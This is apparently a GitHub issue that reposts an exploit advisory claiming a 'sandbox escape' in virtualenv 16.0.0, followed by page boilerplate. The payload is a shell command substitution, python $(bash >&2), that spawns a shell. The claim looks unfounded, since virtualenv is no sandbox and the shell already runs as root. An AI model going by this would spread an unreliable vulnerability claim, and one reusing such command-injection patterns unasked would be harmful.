virtualenv Sandbox escape

Exploit Title: virtualenv Sandbox escape
Date: 2018-9-30
Exploit Author: Topsec Technologies Inc. - vr_system
Version: 16.0.0
Tested on: kali linux
CVE : None

```1、install
root@kali:~#pip install virtualenv
root@kali:~#virtualenv test_env
root@kali:~#cd test_env/
root@kali:~/test_env#source ./bin/activate
(test_env) root@kali:~/test_env#`
`2、Sandbox escape
(test_env) root@kali:~/test_env#python $(bash >&2)
root@kali:~#
(test_env) root@kali:~/test_env#python $(rbash >&2)
root@kali:~#```


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

virtualenv Sandbox escape #1207

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Uh oh!

virtualenv Sandbox escape #1207

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions